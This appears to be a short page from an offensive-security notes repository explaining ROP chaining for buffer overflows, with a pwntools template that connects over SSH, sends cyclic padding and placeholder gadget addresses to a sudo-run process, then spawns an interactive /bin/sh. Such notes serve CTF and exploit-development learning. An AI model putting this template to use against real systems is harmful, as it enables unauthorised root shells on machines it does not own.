killchain-compendium/exploit/binaries/buffer_overflow/ropping.md

29 lines
507 B
Markdown
Raw Normal View History

2022-02-14 23:22:18 +01:00
# ROP Chaining
## Usage
* Find cyclic buffer size
* Find gadgets via `ropper` or even better `ropstar`
## Example
```python
from pwn import *
s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
p = s.process(['sudo', '<process>'])
offset=<found_offset_len>
# take the ropchain from ropstar
payload = cyclic(offset)
payload += p64(0x4711)
payload += p64(0x235)
payload += p64(0x007)
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')
```